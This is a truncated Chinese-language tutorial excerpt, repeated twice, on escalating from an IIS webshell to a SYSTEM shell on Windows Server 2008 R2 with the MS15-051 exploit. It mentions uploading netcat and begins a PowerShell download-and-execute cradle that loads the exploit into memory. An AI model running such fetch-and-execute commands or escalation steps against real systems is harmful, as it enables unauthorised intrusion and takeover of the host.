powershell远程加载ms15-051exp对win2008 R2提权
> 环境:win2008R2一台 > 外网服务器一台 > 场景:已经得到win2008R2的webshell,权限的iis,目标是得到system权限的交互式shell。 ### 方法1:上传nc到win2008R2 ``` ms15-051在内存提权 powershell IEX (New-Object Net.WebClient).Downlo...
> 环境:win2008R2一台 > 外网服务器一台 > 场景:已经得到win2008R2的webshell,权限的iis,目标是得到system权限的交互式shell。 ### 方法1:上传nc到win2008R2 ``` ms15-051在内存提权 powershell IEX (New-Object Net.WebClient).Downlo...